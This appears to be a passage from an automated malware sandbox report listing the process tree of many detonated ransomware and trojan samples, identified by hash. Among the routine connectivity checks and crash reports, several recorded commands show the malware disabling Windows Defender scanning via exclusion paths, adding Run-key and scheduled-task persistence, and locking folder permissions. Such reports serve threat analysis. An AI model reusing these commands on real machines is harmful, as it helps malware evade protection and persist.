      4⤵
      PID:6332
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7912
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7360
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8844
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9404
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:1828
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:10396
    - - C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "10396" "2152" "2128" "2156" "0" "0" "2164" "0" "0" "0" "0" "0"
        5⤵
        
        PID:11880
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d30eebdcb0cbe603d6be3cd984c808f324bb2281d0c23fc0a4ee501937736660.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-d30eebdcb0cbe603d6be3cd984c808f324bb2281d0c23fc0a4ee501937736660.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2240
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:3940
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4916
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4916 -s 1164
        5⤵
        Program crash
        
        PID:11112
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      PID:5556
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5556 -s 1144
        5⤵
        Program crash
        
        PID:10708
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6136
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 2032
        5⤵
        Program crash
        
        PID:740
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6564
    - - C:\Windows\SysWOW64\wermgr.exe
        
        "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6564" "2168" "2136" "2172" "0" "0" "2176" "0" "0" "0" "0" "0"
        5⤵
        
        PID:10256
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6160
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7764
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:3852
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8664
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9008
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9696
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7596
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:10784
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 10784 -s 2036
        5⤵
        Program crash
        
        PID:1724
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3ee5744817862d7e419d46ec2f89238c64d8fb18b3acf15863396143039bd63.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3ee5744817862d7e419d46ec2f89238c64d8fb18b3acf15863396143039bd63.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1784
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:224
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:5704
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:5460
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6732
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6284
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6284 -s 1116
        5⤵
        Program crash
        
        PID:10688
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7904
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7492
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8704
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9284
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:10188
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:10304
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:11260
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9224
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8640
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7948
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7948 -s 1708
        5⤵
        Program crash
        
        PID:11860
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8736
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8736 -s 1760
        5⤵
        Program crash
        
        PID:740
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:6180
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:10068
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:8144
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7848
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:7208
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:9924
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:1772
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:11308
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com
      4⤵
      PID:11428
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Blocker.gen-e0570539e2c37c965ba77f0ba174cf3108c60c5ac5ca8aba0817d7ae0e6c939a.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-e0570539e2c37c965ba77f0ba174cf3108c60c5ac5ca8aba0817d7ae0e6c939a.exe
    3⤵
    - Executes dropped EXE
    PID:892
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Blocker.gen-e7167517b12c9008ae1fe63077f255ecb027948d35ee7c232afe1fae6ef9e4b1.exe
    HEUR-Trojan-Ransom.MSIL.Blocker.gen-e7167517b12c9008ae1fe63077f255ecb027948d35ee7c232afe1fae6ef9e4b1.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2428
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mainprog" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Mainprog.exe"
      4⤵
      PID:6908
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Mainprog" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Mainprog.exe"
        5⤵
        
        PID:8976
  - - C:\Users\Admin\AppData\Roaming\Mainprog.exe
      "C:\Users\Admin\AppData\Roaming\Mainprog.exe"
      4⤵
      PID:11892
    - - C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
        
        "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
        5⤵
        
        PID:3892
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3892 -s 520
        6⤵
        Program crash
        
        PID:10092
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Crypren.gen-6ef93a6f17bded4b132a4ac81aa36d8a9952edcffd976e5c960143265b44b0a3.exe
    HEUR-Trojan-Ransom.MSIL.Crypren.gen-6ef93a6f17bded4b132a4ac81aa36d8a9952edcffd976e5c960143265b44b0a3.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3128
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Encoder.gen-f85d0e5a44227717ee495b09ea81b79af918c4c29308c449c706a4990559817e.exe
    HEUR-Trojan-Ransom.MSIL.Encoder.gen-f85d0e5a44227717ee495b09ea81b79af918c4c29308c449c706a4990559817e.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5436
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Foreign.gen-2cfb8c54a243f21147669f13c67adaa0f3cd9fc419fdc6dc01800e0679c0830f.exe
    HEUR-Trojan-Ransom.MSIL.Foreign.gen-2cfb8c54a243f21147669f13c67adaa0f3cd9fc419fdc6dc01800e0679c0830f.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6004
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.Foreign.gen-e16df177681e356ab8a9491e841fa1a757bc40069e2f42493b9238f0584cb9f1.exe
    HEUR-Trojan-Ransom.MSIL.Foreign.gen-e16df177681e356ab8a9491e841fa1a757bc40069e2f42493b9238f0584cb9f1.exe
    3⤵
    PID:6272
  - - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\~.sonam kaur.doc" /o ""
      4⤵
      PID:5728
  - - C:\ProgramData\HPathvwra\othvidtiraw.exe
      "C:\ProgramData\HPathvwra\othvidtiraw.exe"
      4⤵
      PID:10792
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-e1e1131c1e843bc8c28bd7533d8416d1c3daf10efe0ad9e95770b322d16790b2.exe
    HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-e1e1131c1e843bc8c28bd7533d8416d1c3daf10efe0ad9e95770b322d16790b2.exe
    3⤵
    PID:6492
  - - C:\Windows\system32\msiexec.exe
      /i "C:\Users\Admin\AppData\Roaming\Microsoft Corporation\Microsoft Visual C++ 2020 Redistributable (x64) - 12.04.23654 2.0.0\install\setup.msi" AI_SETUPEXEPATH="C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.MSIL.PolyRansom.gen-e1e1131c1e843bc8c28bd7533d8416d1c3daf10efe0ad9e95770b322d16790b2.exe" SETUPEXEDIR="C:\Users\Admin\Desktop\00451\" EXE_CMD_LINE="/exenoupdates /exelang 0 /noprereqs "
      4⤵
      PID:7936
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-97673786bbe1a0224a4327af96b08b1efc6cc4fe4028a3da9e479afc08bd1cf8.exe
    HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-97673786bbe1a0224a4327af96b08b1efc6cc4fe4028a3da9e479afc08bd1cf8.exe
    3⤵
    PID:7284
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-5516386adcec371fa286882697011e9b791847693b8dd973556b93983c7fdba1.exe
    HEUR-Trojan-Ransom.Win32.GandCrypt.gen-5516386adcec371fa286882697011e9b791847693b8dd973556b93983c7fdba1.exe
    3⤵
    PID:8648
  - - C:\Windows\T-5060548008706965508605070\winsvc.exe
      C:\Windows\T-5060548008706965508605070\winsvc.exe
      4⤵
      PID:9388
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9388 -s 524
        5⤵
        Program crash
        
        PID:10460
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8648 -s 572
      4⤵
      Program crash
      PID:10068
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-9c8748a8c0f0330158f1a6ae60ad35835283ae9a273ea1fc8a5b871e4bb76c33.exe
    HEUR-Trojan-Ransom.Win32.GandCrypt.gen-9c8748a8c0f0330158f1a6ae60ad35835283ae9a273ea1fc8a5b871e4bb76c33.exe
    3⤵
    PID:9896
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.Win32.Generic-e001f6a5b2d4d2659b010fb5825eb4383e8f415861a244329bc70cfcd18da507.exe
    HEUR-Trojan-Ransom.Win32.Generic-e001f6a5b2d4d2659b010fb5825eb4383e8f415861a244329bc70cfcd18da507.exe
    3⤵
    PID:10676
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.Win32.Instructions.vho-0d800488db5c37b608316c48da1cb13bb43cea2c22508453fa4245229fb7a090.exe
    HEUR-Trojan-Ransom.Win32.Instructions.vho-0d800488db5c37b608316c48da1cb13bb43cea2c22508453fa4245229fb7a090.exe
    3⤵
    PID:11084
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.Win32.Stop.gen-26967c1b5ff6848501ddf70985408b7736835286f788f663e086f34aecd6bfb1.exe
    HEUR-Trojan-Ransom.Win32.Stop.gen-26967c1b5ff6848501ddf70985408b7736835286f788f663e086f34aecd6bfb1.exe
    3⤵
    PID:6316
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.Win32.Stop.gen-26967c1b5ff6848501ddf70985408b7736835286f788f663e086f34aecd6bfb1.exe
      HEUR-Trojan-Ransom.Win32.Stop.gen-26967c1b5ff6848501ddf70985408b7736835286f788f663e086f34aecd6bfb1.exe
      4⤵
      PID:5024
    - - C:\Windows\SysWOW64\icacls.exe
        
        icacls "C:\Users\Admin\AppData\Local\f876f4e3-71a8-484e-97e6-076e8a735a9d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        5⤵
        Modifies file permissions
        
        PID:2260
    - - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.Win32.Stop.gen-26967c1b5ff6848501ddf70985408b7736835286f788f663e086f34aecd6bfb1.exe
        
        "C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.Win32.Stop.gen-26967c1b5ff6848501ddf70985408b7736835286f788f663e086f34aecd6bfb1.exe" --Admin IsNotAutoStart IsNotTask
        5⤵
        
        PID:5352
      - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.Win32.Stop.gen-26967c1b5ff6848501ddf70985408b7736835286f788f663e086f34aecd6bfb1.exe
        
        "C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.Win32.Stop.gen-26967c1b5ff6848501ddf70985408b7736835286f788f663e086f34aecd6bfb1.exe" --Admin IsNotAutoStart IsNotTask
        6⤵
        
        PID:8832
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.Win32.Stop.gen-954cc32be4e5b358fe9be2b82ff954d5fec236c89c4487293af062b0f9992407.exe
    HEUR-Trojan-Ransom.Win32.Stop.gen-954cc32be4e5b358fe9be2b82ff954d5fec236c89c4487293af062b0f9992407.exe
    3⤵
    PID:11144
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 11144 -s 276
      4⤵
      Program crash
      PID:392
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan-Ransom.Win32.Stop.gen-f8b60e554ed303e2debe7422bb363dcc33ace171d02388bce2e8ab5ce5364f5d.exe
    HEUR-Trojan-Ransom.Win32.Stop.gen-f8b60e554ed303e2debe7422bb363dcc33ace171d02388bce2e8ab5ce5364f5d.exe
    3⤵
    PID:9420
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 9420 -s 304
      4⤵
      Program crash
      PID:11688
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-0fe5280347148f2f9343daef80e46dd507a3ae6ad088e92426b78c541cec466f.exe
    HEUR-Trojan.MSIL.Crypt.gen-0fe5280347148f2f9343daef80e46dd507a3ae6ad088e92426b78c541cec466f.exe
    3⤵
    PID:4212
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-2892ceb10676ea811a7d9caab1a1d15bb1f81215e2876b28ab50bbc898a69c47.exe
    HEUR-Trojan.MSIL.Crypt.gen-2892ceb10676ea811a7d9caab1a1d15bb1f81215e2876b28ab50bbc898a69c47.exe
    3⤵
    PID:12148
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\radar.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\radar.exe"
      4⤵
      PID:9856
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\Server3.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Server3.exe"
      4⤵
      PID:11456
    - - C:\Users\Admin\AppData\Local\Temp\Dllhost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Dllhost.exe"
        5⤵
        
        PID:9844
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-4d16ac850f443e678e5cdc8c104f9369a97e8347c3a64f3fce173329072fee53.exe
    HEUR-Trojan.MSIL.Crypt.gen-4d16ac850f443e678e5cdc8c104f9369a97e8347c3a64f3fce173329072fee53.exe
    3⤵
    PID:4576
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-4d16ac850f443e678e5cdc8c104f9369a97e8347c3a64f3fce173329072fee53.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2316
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\egGZqtIOrEmq.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:7884
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egGZqtIOrEmq" /XML "C:\Users\Admin\AppData\Local\Temp\tmpD7FD.tmp"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3584
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\egGZqtIOrEmq.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3932
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-4d16ac850f443e678e5cdc8c104f9369a97e8347c3a64f3fce173329072fee53.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-4d16ac850f443e678e5cdc8c104f9369a97e8347c3a64f3fce173329072fee53.exe"
      4⤵
      PID:10904
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-501f741d9e463251c16f65bebca18eb103091b18e16ad7aa8f6b362f6e3050bf.exe
    HEUR-Trojan.MSIL.Crypt.gen-501f741d9e463251c16f65bebca18eb103091b18e16ad7aa8f6b362f6e3050bf.exe
    3⤵
    PID:5852
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-501f741d9e463251c16f65bebca18eb103091b18e16ad7aa8f6b362f6e3050bf.exe
      C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-501f741d9e463251c16f65bebca18eb103091b18e16ad7aa8f6b362f6e3050bf.exe
      4⤵
      PID:6300
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-501f741d9e463251c16f65bebca18eb103091b18e16ad7aa8f6b362f6e3050bf.exe
      C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-501f741d9e463251c16f65bebca18eb103091b18e16ad7aa8f6b362f6e3050bf.exe
      4⤵
      PID:6080
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-501f741d9e463251c16f65bebca18eb103091b18e16ad7aa8f6b362f6e3050bf.exe
      C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-501f741d9e463251c16f65bebca18eb103091b18e16ad7aa8f6b362f6e3050bf.exe
      4⤵
      PID:11768
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-501f741d9e463251c16f65bebca18eb103091b18e16ad7aa8f6b362f6e3050bf.exe
      C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-501f741d9e463251c16f65bebca18eb103091b18e16ad7aa8f6b362f6e3050bf.exe
      4⤵
      PID:12184
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-529428b0769205f72516b01a419fa12d8af2131597a8bb264e89ae2a9c7c2858.exe
    HEUR-Trojan.MSIL.Crypt.gen-529428b0769205f72516b01a419fa12d8af2131597a8bb264e89ae2a9c7c2858.exe
    3⤵
    PID:9384
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      4⤵
      PID:6820
    - - C:\Windows\SysWOW64\notepad.exe
        
        notepad
        5⤵
        
        PID:7260
    - - C:\Users\Admin\Documents\MSDCSC\msdcsc.exe
        
        "C:\Users\Admin\Documents\MSDCSC\msdcsc.exe"
        5⤵
        
        PID:1056
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-53cb0504056f2c5a8e51d76f4de0fbcfdfc40a86ead4853a3483f71e4d258467.exe
    HEUR-Trojan.MSIL.Crypt.gen-53cb0504056f2c5a8e51d76f4de0fbcfdfc40a86ead4853a3483f71e4d258467.exe
    3⤵
    PID:10576
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-53cb0504056f2c5a8e51d76f4de0fbcfdfc40a86ead4853a3483f71e4d258467.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-53cb0504056f2c5a8e51d76f4de0fbcfdfc40a86ead4853a3483f71e4d258467.exe"
      4⤵
      PID:11776
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-53cb0504056f2c5a8e51d76f4de0fbcfdfc40a86ead4853a3483f71e4d258467.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-53cb0504056f2c5a8e51d76f4de0fbcfdfc40a86ead4853a3483f71e4d258467.exe"
      4⤵
      PID:220
  - - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-53cb0504056f2c5a8e51d76f4de0fbcfdfc40a86ead4853a3483f71e4d258467.exe
      "C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-53cb0504056f2c5a8e51d76f4de0fbcfdfc40a86ead4853a3483f71e4d258467.exe"
      4⤵
      PID:8848
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8848 -s 1332
        5⤵
        Program crash
        
        PID:5212
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-5c1f581f9d11fd4614ae17de1eaa58f5e37f47d15d18943214abe9c05f55e97d.exe
    HEUR-Trojan.MSIL.Crypt.gen-5c1f581f9d11fd4614ae17de1eaa58f5e37f47d15d18943214abe9c05f55e97d.exe
    3⤵
    PID:11260
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-70b71de5159cc877c54fb792ec132e2ee741ed052e7803f9ccde5b503f0be91d.exe
    HEUR-Trojan.MSIL.Crypt.gen-70b71de5159cc877c54fb792ec132e2ee741ed052e7803f9ccde5b503f0be91d.exe
    3⤵
    PID:10360
- - C:\Users\Admin\Desktop\00451\HEUR-Trojan.MSIL.Crypt.gen-773aedf2e593c78b718719b7f65fb1054570acc429fcccce2a94da72f0659d28.exe
    HEUR-Trojan.MSIL.Crypt.gen-773aedf2e593c78b718719b7f65fb1054570acc429fcccce2a94da72f0659d28.exe
    3⤵
    PID:9676
